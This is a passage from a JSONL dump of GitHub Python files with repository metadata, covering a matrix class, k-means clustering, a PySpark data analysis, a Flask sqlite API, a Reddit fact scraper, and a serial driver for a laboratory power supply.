return False\n elif my_function == function5:\n try:\n sleep(2)\n poco(textMatches='.*水印').wait_for_appearance(5)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n\n\nif __name__ == '__main__':\n x = ItemList()\n\n ","repo_name":"18901728477/ui_test_project-master","sub_path":"mobile/mitem_ui_test/mitem_ui_test/pages/item_list_page.py","file_name":"item_list_page.py","file_ext":"py","file_size_in_byte":13223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2249018719","text":"# Matrix.\n\n\n# Write a class that can represent any 4ЁЭСе4 real matrix.\n# Include two functions to calculate the sum and dot product of two matrices.\n# Next, write a program that imports this library module and use it to perform calculations.\n# You CAN'T use numpy.\n# Examples:\n#\n# matrix_1 = Matrix(4.,5.,6.,7.)\n# matrix_2 = Matrix(2.,2.,2.,1.)\n#\n# matrix_3 = matrix_2 @ matrix_1\n# matrix_4 = matrix_2 + matrix_1\n# matrix_4 = 6 + matrix_1\n# matrix_4 = matrix_1 + 6\n#\n# expand your solution to include other operations like\n# - subtraction\n# - inversion\n# - string representation\n#\n# Try to expand your implementation as best as you can.\n# Think of as many features as you can, and try implementing them.\n# Make intelligent use of pythons syntactic sugar (overloading, iterators, generators, etc)\n# Most of all: CREATE GOOD, RELIABLE, READABLE CODE.\n# The goal of this task is for you to SHOW YOUR BEST python programming skills.\n# Impress everyone with your skills, show off with your code.\n#\n# Your program must be runnable with command \"python task.py\".\n# Show some usecases of your library in the code (print some things)\n# Delete these comments before commit!\n#\n# Good luck.\nimport logging\n\n\nclass NonMatchingMatrixSizes(Exception):\n\n def __init__(self, matrix1Size, matrix2Size):\n self.matrix1Size = matrix1Size\n self.matrix2Size = matrix2Size\n self.message = \"Matrix of size {}x{} and Matrix of size {}x{} do not match\".format(\n self.matrix1Size, self.matrix1Size, self.matrix2Size, self.matrix2Size)\n super(NonMatchingMatrixSizes, self).__init__(self.message)\n\n\nclass SquareMatrix:\n\n def __init__(self, data=\"Empty\", size=2):\n if data != \"Empty\":\n self.size = len(data)\n else:\n self.size = size\n\n self.Matrix = self._createEmptyMatrixOfSize(self.size)\n if data != \"Empty\":\n for i in range(self.size):\n for j in range(self.size):\n self.Matrix[i][j] = data[i][j]\n\n def transpone(self):\n logging.info(\"Ongoing Operation: Matrix transposition\")\n transpositionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n for i in range(self.size):\n for j in range(self.size):\n transpositionProduct.Matrix[i][j] = self.Matrix[j][i]\n return transpositionProduct\n\n def __str__(self, loggingValue=\"\"):\n loggingValue = \"Displaying Matrix of size {}x{}:\\n\".format(\n self.size, self.size)\n loggingValue += self._getMatrixValues()\n return loggingValue\n\n def __repr__(self):\n return self._getMatrixValues()\n\n def __add__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n additionProdut = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n additionProdut = self._calculateWithOperand(\n self, '+', secondMatrix, additionProdut)\n elif secondOperand[\"type\"] == \"matrix\":\n additionProdut = self._calculateMatrices(\n self, '+', secondMatrix, additionProdut)\n return additionProdut\n\n def __radd__(self, secondOperand: int):\n additionProdut = SquareMatrix(data=\"Empty\", size=self.size)\n additionProdut = self._calculateWithOperand(\n self, '+', secondOperand, additionProdut)\n return additionProdut\n\n def __sub__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n subtractionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n subtractionProduct = self._calculateWithOperand(\n self, '-', secondMatrix, subtractionProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n subtractionProduct = self._calculateMatrices(\n self, '-', secondMatrix, subtractionProduct)\n return subtractionProduct\n\n def __rsub__(self, secondOperand: int):\n subtractionProduct = SquareMatrix(data=\"Empty\", size=self.size)\n subtractionProduct = self._calculateWithOperand(\n self, \"-\", secondOperand, subtractionProduct)\n return subtractionProduct\n\n def __mul__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '*', secondMatrix, multiplicationProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n multiplicationProduct = self._calculateMatrices(\n self, '*', secondMatrix, multiplicationProduct)\n return multiplicationProduct\n\n def __rmul__(self, secondOperand: int):\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n multiplicationProduct = self._calculateWithOperand(\n self, \"*\", secondOperand, multiplicationProduct)\n return multiplicationProduct\n\n def __truediv__(self, secondMatrix):\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '/', secondMatrix, multiplicationProduct)\n elif secondOperand[\"type\"] == \"matrix\":\n multiplicationProduct = self._calculateMatrices(\n self, '/', secondMatrix, multiplicationProduct)\n return multiplicationProduct\n\n def __rtruediv__(self, secondOperand: int):\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n multiplicationProduct = self._calculateWithOperand(\n self, \"/\", secondOperand, multiplicationProduct)\n return multiplicationProduct\n\n def __matmul__(self, secondMatrix):\n logging.info(\"Ongoing Operation: Matrix @ Matrix multiplication\")\n secondOperand = self._validateMatricesSizes(self, secondMatrix)\n multiplicationProduct = SquareMatrix(data=\"Empty\", size=self.size)\n if secondOperand[\"type\"] == \"int\":\n multiplicationProduct = self._calculateWithOperand(\n self, '*', secondMatrix, multiplicationProduct)\n if secondOperand[\"type\"] == \"matrix\":\n for i in range(len(self.Matrix)):\n for j in range(len(secondMatrix.Matrix[0])):\n for k in range(len(secondMatrix.Matrix)):\n multiplicationProduct.Matrix[i][j] += self.Matrix[i][k] * \\\n secondMatrix.Matrix[k][j]\n return multiplicationProduct\n\n def _calculateWithOperand(self, firstOperand, operator, secondOperand, result):\n logging.info(\"Ongoing Operation: Matrix {} {}\".format(\n operator, secondOperand))\n for i in range(firstOperand.size):\n for j in range(firstOperand.size):\n result.Matrix[i][j] = eval(\n \"firstOperand.Matrix[i][j]\" + operator + \"secondOperand\")\n return result\n\n def _calculateMatrices(self, firstOperand, operator, secondOperand, result):\n logging.info(\n \"calculating Matrices, operation operator: {}\".format(operator))\n for i in range(firstOperand.size):\n for j in range(firstOperand.size):\n result.Matrix[i][j] = eval(\n \"firstOperand.Matrix[i][j]\" + operator + \"secondOperand.Matrix[i][j]\")\n return result\n\n def _createEmptyMatrixOfSize(self, size):\n return [[0 for i in range(size)] for j in range(size)]\n\n def _getMatrixValues(self):\n loggingValue = \"\"\n for i in range(self.size):\n for j in range(self.size):\n loggingValue += \"{} \".format(self.Matrix[i][j])\n loggingValue += \"\\n\"\n return loggingValue\n\n def _validateMatricesSizes(self, matrix1, matrix2):\n if isinstance(matrix2, int):\n operandType = {}\n operandType[\"type\"] = \"int\"\n return operandType\n if matrix1.size != matrix2.size:\n raise NonMatchingMatrixSizes(matrix1.size, matrix2.size)\n operandType = {}\n operandType[\"type\"] = \"matrix\"\n return operandType\n\n\nif __name__ == \"__main__\":\n\n # Displaying info logs for better comprehension of the example operations presented below\n logging.basicConfig(level=logging.DEBUG)\n\n logging.info(\"creating the first 2x2 matrix\")\n filledMatrix_2x2 = SquareMatrix([[1, 2],\n [3, 4]])\n print(filledMatrix_2x2)\n\n logging.info(\"creating the second 2x2 matrix\")\n secondFilledMatrix_2x2 = SquareMatrix([[4, 3],\n [2, 1]])\n print(secondFilledMatrix_2x2)\n\n matrixAddition = filledMatrix_2x2 + secondFilledMatrix_2x2\n print(matrixAddition)\n\n matrixsubtraction = filledMatrix_2x2 - secondFilledMatrix_2x2\n print(matrixsubtraction)\n\n matrixNumAddition = 2 + filledMatrix_2x2\n print(matrixNumAddition)\n\n matrixNumSubtraction = 2 - filledMatrix_2x2\n print(matrixNumSubtraction)\n\n matrixNumMultiplication = 2 * filledMatrix_2x2\n print(matrixNumMultiplication)\n\n matrixNumDivision = 2 / filledMatrix_2x2\n print(matrixNumDivision)\n\n matrixMultiplication = filledMatrix_2x2 @ secondFilledMatrix_2x2\n print(matrixMultiplication)\n\n logging.info(\"creating a 3x3 matrix for transposition purposes\")\n filledMatrix_3x3 = SquareMatrix([[1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]])\n print(filledMatrix_3x3)\n\n matrixTranspone = filledMatrix_3x3.transpone()\n print(matrixTranspone)\n\n logging.info(\"creating a 4x4 EMPTY matrix\")\n emptyMatrix_4x4 = SquareMatrix(data=\"Empty\", size=4)\n print(emptyMatrix_4x4)\n","repo_name":"pite2020win/fri-11-20-task3-michalloska","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":9946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"35454914147","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.factorization import KMeans\nimport pickle\nimport matplotlib.pyplot as plt\n\n# Remove use of GPU\n# import os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\n# import SoNYC data:\nsonyc_length = 128\nclass_length = 1\nprint(\"** Loading SoNYC datasets **\")\nnegative_xy = pickle.load(open(\"../data/negative_xy.pickle\", \"rb\"))\npositive_xy = pickle.load(open(\"../data/positive_xy.pickle\", \"rb\"))\n\n# Choose the data source\nx_pool_file = \"../data/X_pool.pickle\" # 1000 * 128\n# x_pool_file = \"../data/X_pool_10000_new.pickle\" # 10000 * 132\n# x_pool_file = \"../data/X_pool_100000_new.pickle\"\n# x_pool_file = \"../data/X_pool_100000_random.pickle\"\nX_pool = pickle.load(open(x_pool_file, \"rb\"))\n\n# Modify the SoNYC data (a little bit) just for this model:\nX_pool = X_pool[:,:sonyc_length] # number_of_unlabeled * 128\nlabeled_data = np.vstack((positive_xy, negative_xy)) # 600 * 129\nlabels = labeled_data[:, sonyc_length] # 600 * 1\nMat_Label = np.split(labeled_data, [sonyc_length], axis=1)[0] # 600 * 128\n\nfull_data_x = np.vstack((Mat_Label, X_pool))\n\n# Parameters\nkmean_iterations = 200 # Total steps to train\nk = 2 # The number of clusters\nnum_classes = 2 # good or bad audio\nnum_features = 128 # Length of each audio embedding = 128\n\nX = tf.placeholder(tf.float32, shape=[None, num_features])\n\nkmeans = KMeans(inputs=X,\n num_clusters=k,\n distance_metric='cosine',\n use_mini_batch=True)\n\n# use tensorflow 1.7\n(all_scores, cluster_idx, scores, cluster_centers_initialized, init_op, train_op) = kmeans.training_graph()\n\ncluster_idx = cluster_idx[0]\navg_distance = tf.reduce_mean(scores)\n\ninit_vars = tf.global_variables_initializer()\n\nsess = tf.Session()\n\nsess.run(init_vars, feed_dict={X: full_data_x})\nsess.run(init_op, feed_dict={X: full_data_x})\n\nerror_rates = []\ndisplay_steps = 10\nfor i in range(1, kmean_iterations + 1):\n _, d, idx = sess.run([train_op, avg_distance, cluster_idx], feed_dict={X: full_data_x})\n\n part1 = idx[0:300]\n part2 = idx[301:600]\n sumPart1 = np.sum(part1)\n sumPart2 = np.sum(part2)\n # Label the cluster\n if sumPart1 >= sumPart2: # as it is\n correct_part1 = sumPart1\n correct_part2 = 300-sumPart2\n else: # reverse\n correct_part1 = 300-sumPart1\n correct_part2 = sumPart2\n\n # Calculate error rate:\n error_rate = 1 - (correct_part1 + correct_part2)/600\n error_rates.append(error_rate)\n\n if i % display_steps == 0 or i == 1:\n print(\"Step %i, Avg Distance: %f\" % (i, d))\n print('Error rate: %f' % error_rate)\n\n# Plot error rate\nplt.plot(error_rates)\nplt.xlabel(\"Iteration\")\nplt.ylabel(\"Error Rate\")\nplt.title(\"Error Rate in K-Means Iterations. \\nUnlabel File:\"+x_pool_file)\nplt.axis([-10, kmean_iterations+10, 0, 1])\nplt.show()\n\n","repo_name":"wangyu/sonyc_distortion_classification","sub_path":"models/kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"10886326353","text":"from pyspark import SparkContext\r\nfrom pyspark.sql import SQLContext\r\n\r\nspark = (SparkSession \\\r\n .builder \\\r\n .appName('Project_name') \\\r\n .config('spark.executor.memory', '20G') \\\r\n .config('spark.driver.memory', '20G') \\\r\n .config('spark.driver.maxResultSize', '10G') \\\r\n .config('spark.sql.shuffle.partitions',300) \\\r\n .config('spark.worker.cleanup.enabled', 'True') \\\r\n .config('spark.local.dir','/tmp/spark-temp') \\\r\n .getOrCreate())\r\n\r\n# sc= SparkContext(appName=\"si618_hw6_output_1_shiyuguo\")\r\nsqlContext = SQLContext(sc)\r\ngdp_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/gdp_d.csv\",header=True)\r\nmortality_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/mortality_d.csv\",header=True)\r\ncontinent_df=sqlContext.read.csv(\"hdfs://cavium-thunderx/user/shiyuguo/Project1/countryContinent.csv\",header=True)\r\n\r\ngdp_df.printSchema()\r\nmortality_df.printSchema()\r\ncontinent_df.printSchema()\r\n\r\n### Reshape data from wide to long\r\ncols1=gdp_df.columns[4:]\r\ngdp_df.withColumnRenamed(\"Country Name\",\"Country_name\") \\\r\n .withColumnRenamed(\"Country Code\",\"Country_code\") \\\r\n .selectExpr('Country_name','Country_code',\"stack({0},{1}) as (`Year`,`GDP_percapita`)\".format(len(cols1), ','.join((\"'{}', `{}`\".format(i, i) for i in cols1)))) \\\r\n .registerTempTable('gdp')\r\n\r\ncols2=mortality_df.columns[4:]\r\nmortality_df.withColumnRenamed(\"Country Code\",\"Country_code\") \\\r\n .withColumnRenamed(\"Country Name\",\"Country_name\") \\\r\n .selectExpr('Country_name','Country_code',\"stack({0},{1}) as (`Year`,`Mortality_rate`)\".format(len(cols2), ','.join((\"'{}', `{}`\".format(i, i) for i in cols2)))) \\\r\n .registerTempTable('mortality')\r\n \r\ncontinent_df.registerTempTable('continent')\r\n\r\n### Join 3 datasets\r\nmerge1 = sqlContext.sql('SELECT g.Country_name, g.Country_code, CAST(g.Year as double), CAST(g.GDP_percapita as double), CAST(m.Mortality_rate as double) \\\r\n FROM gdp g FULL OUTER JOIN mortality m ON (g.Country_name=m.Country_name AND g.Year=m.Year) \\\r\n WHERE g.Year !=2020 \\\r\n ORDER BY g.Country_name,g.Year ASC').registerTempTable('Merge1')\r\n\r\nmerge2= sqlContext.sql('SELECT m.Country_name, c.continent, c.sub_region,m.Year,m.GDP_percapita as GDP_percapita,(m.Mortality_rate/1000)*100 as Mortalityrate \\\r\n FROM Merge1 m JOIN continent c ON (m.Country_code=c.code_3 AND m.Country_name=c.country) \\\r\n WHERE m.Year !=2020 \\\r\n ORDER BY m.Country_name,m.Year ASC')\r\nmerg2rdd= merge2.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_final_merge')\r\nmerge2.registerTempTable('Merge2')\r\n\r\n###Q1: World and Continent Huamn progress trends\r\nworld_ratio= sqlContext.sql('SELECT Year, round(avg(Mortalityrate),2),round(avg(GDP_percapita),2) \\\r\n FROM Merge2 WHERE Year <=2015 GROUP BY Year ORDER BY Year ASC')\r\n\r\nworld_ratiordd= world_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_world_ratio')\r\n\r\n\r\ncontinent_ratio = sqlContext.sql('SELECT continent,Year, round(avg(Mortalityrate),2),round(avg(GDP_percapita),2) \\\r\n FROM Merge2 WHERE Year<=2015 GROUP BY continent,Year ORDER BY continent,Year ASC') \r\n\r\ncontinent_ratiordd= continent_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_continent_ratio')\r\n\r\n### Q2: The performance of countries by regions before and after 2015\r\ndifference = sqlContext.sql('SELECT b.Country_name,b.continent,b.sub_region,b.Year,b.Mortalityrate-a.Mortalityrate AS Mortality_diff, ((b.GDP_percapita-a.GDP_percapita)/a.GDP_percapita)*100 AS GDPPer_diff \\\r\n FROM Merge2 a JOIN Merge2 b on b.Country_name=a.Country_name AND (b.Year-1)=a.Year \\\r\n ORDER BY b.Country_name,b.Year ASC')\r\ndifferencerdd= difference.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_merge_diff')\r\n\r\ndifference.registerTempTable('Diff') \r\npre_subregion_ratio= sqlContext.sql('SELECT continent, sub_region,round(avg(Mortality_diff/GDPPer_diff),4) AS pre_ratio \\\r\n FROM Diff WHERE Year <= 2015 \\\r\n GROUP BY continent,sub_region ORDER BY continent,sub_region DESC').registerTempTable('pre_subregion')\r\n\r\npost_subregion_ratio=sqlContext.sql('SELECT continent, sub_region,round(avg(Mortality_diff/GDPPer_diff),4) AS post_ratio \\\r\n FROM Diff WHERE Year > 2015 \\\r\n GROUP BY continent,sub_region ORDER BY continent,sub_region DESC').registerTempTable('post_subregion')\r\n\r\nsubregion_ratio = sqlContext.sql('SELECT b.continent,b.sub_region,a.pre_ratio, b.post_ratio,ROUND(b.post_ratio-a.pre_ratio,4) AS ratio_compare \\\r\n FROM post_subregion b JOIN pre_subregion a ON b.continent=a.continent AND b.sub_region=a.sub_region \\\r\n ORDER BY continent,ratio_compare DESC')\r\n\r\nsubregion_ratiordd= subregion_ratio.rdd.map(lambda i: ','.join(str(j) for j in i)).saveAsTextFile('project1_subregion_ratio')\r\n# subregion_ratio.write.format('csv').option('delimiter',',').option('header','true').save('project1_subregion_ratio')\r\n\r\n#### 3. top 20 well performanced countries pre-2015 and post-2015\r\npre_country_ratio= sqlContext.sql('SELECT Country_name,continent,round(avg(Mortality_diff/GDPPer_diff),3) AS pre_ratio \\\r\n FROM Diff WHERE Year <= 2015 \\\r\n GROUP BY Country_name,continent ORDER BY pre_ratio DESC').registerTempTable('pre_country')\r\n\r\npost_country_ratio= sqlContext.sql('SELECT Country_name, continent, round(avg(Mortality_diff/GDPPer_diff),3) AS post_ratio \\\r\n FROM Diff WHERE Year > 2015 \\\r\n GROUP BY Country_name,continent ORDER BY post_ratio DESC').registerTempTable('post_country')\r\n\r\npre_rank= sqlContext.sql('SELECT * FROM pre_country LIMIT 20').show()\r\n\r\npost_rank= sqlContext.sql('SELECT * FROM post_country LIMIT 20').show()\r\n\r\ncompare_rank= sqlContext.sql('SELECT b.Country_name,b.continent, ROUND(b.post_ratio-a.pre_ratio,3) AS ratio_compare \\\r\n FROM post_country b JOIN pre_country a ON b.Country_name=a.Country_name\\\r\n ORDER BY ratio_compare DESC LIMIT 20') .show()\r\n\r\n","repo_name":"guosy530/Data-Gathering-Processing","sub_path":"Project_code.py","file_name":"Project_code.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37957534123","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def convertBST(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None:\n return root\n queue = [root]\n total = 0\n while len(queue) > 0:\n node = queue.pop()\n total += node.val\n if node.left is not None:\n queue.append(node.left)\n if node.right is not None:\n queue.append(node.right)\n \n temp = 0\n pre_order(root, total, temp)\n return root\n \ndef pre_order(root, total, temp):\n if root is None:\n return temp\n \n if root.left is not None:\n temp = pre_order(root.left, total, temp)\n \n older = root.val\n root.val = total - temp\n temp += older\n \n if root.right is not None:\n temp = pre_order(root.right, total, temp)\n return temp\n \n \n \n \n \n \n","repo_name":"ruizhang84/LeetCode-OJ","sub_path":"convertBST.py","file_name":"convertBST.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"35812049265","text":"import sqlite3\nfrom flask_restful import Resource\n\nclass Platform(Resource):\n def get(self, name):\n game = self.find_by_name(name)\n if game:\n return game\n return {\"message\": \"Platform not found\"}\n\n @classmethod\n def find_by_name(cls, name):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"SELECT * FROM platforms WHERE name=?\"\n result = cursor.execute(query, (name,))\n row = result.fetchone()\n conn.close()\n if row:\n return {\"game\": {\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]}}\n\n @classmethod\n def find_by_id(cls, id):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"SELECT * FROM platforms WHERE id=?\"\n result = cursor.execute(query, (id,))\n row = result.fetchone()\n conn.close()\n if row:\n return {\"game\": {\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]}}\n\n @classmethod\n def insert(cls, platform):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"INSERT INTO platforms VALUES (?,?,?,?,?,?,?)\"\n cursor.execute(query, (platform['name'], platform['price_first_released'], platform['release_date']))\n conn.commit()\n conn.close()\n\n @classmethod\n def update(cls, platform):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"UPDATE games SET name=?, price_first_released=?, release_date=? WHERE name=?\"\n cursor.execute(query, (platform['name'], platform['price_first_released'], platform['release_date'], platform['name']))\n conn.commit()\n conn.close()\n\n def post(self, name):\n data = Platform.parser.parse_args()\n platform = {\"name\": name, \"price_first_released\": data[\"price_first_released\"], \"release_date\": data[\"release_date\"]}\n try:\n self.insert(platform)\n except:\n return {\"message\": \"An error occurred inserting the platform.\"}, 500\n return platform, 201\n\n def delete(self, id):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"DELETE FROM platforms WHERE id=?\"\n cursor.execute(query, (id,))\n conn.commit()\n conn.close()\n return {\"message\": \"Platform deleted\"}\n\n def put(self, id):\n data = Platform.parser.parse_args()\n platform = self.find_by_id(id)\n updated_platform = {\"name\": data['name'], \"price_first_released\": data[\"price_first_released\"], \"release_date\": data[\"release_date\"]}\n if platform is None:\n try:\n self.insert(updated_platform)\n except:\n return {\"message\": \"An error occurred inserting the Platform.\"}\n else:\n try:\n self.update(updated_platform)\n except:\n return {\"message\": \"An error occurred inserting the platform.\"}\n return updated_platform\n\n\nclass PlatformList(Resource):\n def get(self):\n conn = sqlite3.connect('games.db')\n cursor = conn.cursor()\n query = \"SELECT * FROM platforms\"\n result = cursor.execute(query)\n platforms = []\n for row in result:\n platforms.append({\"name\": row[0], \"price_first_released\": row[1], \"release_date\": row[2]})\n conn.close()\n return {\"platforms\": platforms}\n","repo_name":"stradtkt/game_api","sub_path":"platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5502622221","text":"# https://github.com/jorgegonzalez/beginner-projects#watch-for-new-til-facts\n# Finished at 27 Apr 2020\nimport praw, re, time\nfrom praw import exceptions\n\nreddit = praw.Reddit(client_id = 'xxx',\n client_secret = 'xxx',\n user_agent = 'xxx',\n username = 'xxx',\n password = 'xxx')\nsubreddit = reddit.subreddit('todayilearned')\n\n\ndef structure_change(str):\n pattern_front = r'TIL[\\s|\\:]*(that\\s|\\-\\s)*'\n pattern_end = r'(\\.\"|\\.)$'\n if re.match(pattern_front, str):\n new_str = re.sub(pattern_front, '', str, 1)\n new_str = new_str[0].upper() + new_str[1:]\n if re.search(pattern_end, new_str):\n pass\n elif new_str[-1] == ' ':\n new_str = new_str[:-1] + '.'\n else:\n new_str = new_str + '.'\n return new_str\n else:\n return str\n\nold_fact = ''\nnew_fact = ''\nnew_fact_link = ''\n\nwhile True:\n for submission in subreddit.new(limit=1):\n new_fact = submission.title\n new_fact = structure_change(new_fact)\n new_fact_link = submission.url\n if new_fact != old_fact:\n with open('til_facts.txt', 'a') as f:\n f.write('\\n')\n f.write(new_fact + '\\n')\n f.write(f'Link >>> {new_fact_link}\\n')\n old_fact = new_fact\n print(new_fact)\n print(f'Link >>> {new_fact_link}')\n print()\n\n time.sleep(30)","repo_name":"proxima-k/beginner-python-projects","sub_path":"35_TILFacts.py","file_name":"35_TILFacts.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17130663704","text":"import sys\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport time\r\n\r\nclass CPX400DP:\r\n\t\r\n\tserialName=None\r\n\tserialPort=None\r\n\tverbose=False\r\n\tdef __init__(self):\r\n\t\tpass\r\n\t\t\r\n\tdef autoDetection(self):\r\n\t\t# produce a list of all serial ports. The list contains a tuple with the port number, \r\n\t\t# description and hardware address\r\n\t\tports = list(serial.tools.list_ports.comports())\t\t\r\n\t\tprint(\"Detection des appareils\")\r\n\t\tfor port_no, description, address in ports:\r\n\t\t\tprint(description)\r\n\t\t\tif 'CPX400' in description:\r\n\t\t\t\treturn port_no\r\n\t\tprint(\"Aucun appareil détecté\")\r\n\t\treturn None\r\n\t\t\r\n\tdef connection(self, name=None, retry=True, timeout=3):\r\n\t\tcpt=0\r\n\t\toutput=False\r\n\t\twhile output==False:\r\n\t\t\tcpt+=1\r\n\t\t\tif self.verbose: \r\n\t\t\t\tprint(str(cpt))\r\n\t\t\tif name==None:\r\n\t\t\t\tif self.serialName==None:\r\n\t\t\t\t\tself.serialName=self.autoDetection()\r\n\t\t\t\t\t#print(\"Appareil non connecté\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tname=self.serialName\r\n\t\t\t\t\tif self.verbose: \r\n\t\t\t\t\t\tprint(\"Appareil \"+name+\" présent\")\r\n\t\t\tif self.serialName!=None:\r\n\t\t\t\ttry:\r\n\t\t\t\t\t# open serial port\r\n\t\t\t\t\tself.serialPort = serial.Serial(name,115200)\r\n\t\t\t\t\tif self.serialPort.name!=None:\r\n\t\t\t\t\t\toutput=True\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(self.serialName+\" occupée\")\r\n\t\t\t\t\toutput=False\r\n\t\t\tif output==False:\r\n\t\t\t\ttime.sleep(timeout)\r\n\t\tif self.verbose and output: \r\n\t\t\tif self.serialPort.name!=None:\r\n\t\t\t\tprint(\"Connecté à \"+self.serialPort.name)\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Erreur de connection\")\r\n\t\treturn output\r\n\t\r\n\tdef disconnection(self):\r\n\t\tself.serialPort.close()\r\n\t\r\n\tdef setVoltage(self, v, channel=1):\r\n\t\tcmd='V'+str(channel)+' '+str(v)+'\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef getVoltage(self):\r\n\t\treturn 0.0\r\n\t\r\n\tdef setCurrent(self, i, channel=1):\r\n\t\tcmd='I'+str(channel)+' '+str(v)+'\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef getCurrent(self, channel=1):\r\n\t\tcmd='I'+str(channel)+'O?\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\tanswer=self.serialPort.readline()\r\n\t\treturn float(answer[:-3])\r\n\t\r\n\tdef unlock(self):\r\n\t\tcmd='IFUNLOCK\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\r\n\tdef lock(self):\r\n\t\tcmd='IFLOCK\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef switchOn(self, channel=1):\r\n\t\tcmd='OP'+str(channel)+' 1\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\t\r\n\tdef switchOff(self, channel=1):\r\n\t\tcmd='OP'+str(channel)+' 0\\n'\r\n\t\tself.serialPort.write(bytes(cmd.encode('utf-8')))\r\n\t\r\n\t\t","repo_name":"pableur/CPX400DP_API","sub_path":"CPX400DP.py","file_name":"CPX400DP.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"7993548804","text":"from typing import Callable, Any\n\nfrom PyQt5.QtCore import QThread, pyqtSignal, QObject\n\n\nclass BackgroundEvent(QThread):\n completed = pyqtSignal('PyQt_PyObject')\n\n def __init__(self, task: Callable[[], Any], parent: QObject = None):\n QThread.__init__(self, parent)\n self.task = task\n\n def run(self):\n data = self.task()\n self.completed.emit(data)\n","repo_name":"anaynayak/buildnotify","sub_path":"buildnotifylib/core/background_event.py","file_name":"background_event.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"50"} +{"seq_id":"500548308","text":"from __future__ import absolute_import\n\nimport os, sys, json, requests, time, backoff, socket\n\nimport hysds\nfrom hysds.celery import app\nfrom hysds.log_utils import logger, backoff_max_tries, backoff_max_value\n\n \ndef get_job(job_id, rule, result):\n \"\"\"Return generic json job configuration.\"\"\"\n\n priority = rule.get('priority', 0)\n return {\n \"job_type\": \"job:%s\" % rule['job_type'],\n \"priority\": priority,\n \"payload\": {\n \"job_id\": job_id,\n \"rule\": rule,\n \"rule_hit\": result,\n }\n }\n\n\ndef update_query(job_id, rule):\n \"\"\"Update final query.\"\"\"\n\n # build query\n query = rule['query']\n\n # filters\n filts = []\n\n # query all?\n if rule.get('query_all', False) is False:\n filts.append({ 'ids': { 'values': [job_id] }})\n\n # build final query\n if 'filtered' in query:\n final_query = copy.deepcopy(query)\n if 'and' in query['filtered']['filter']:\n 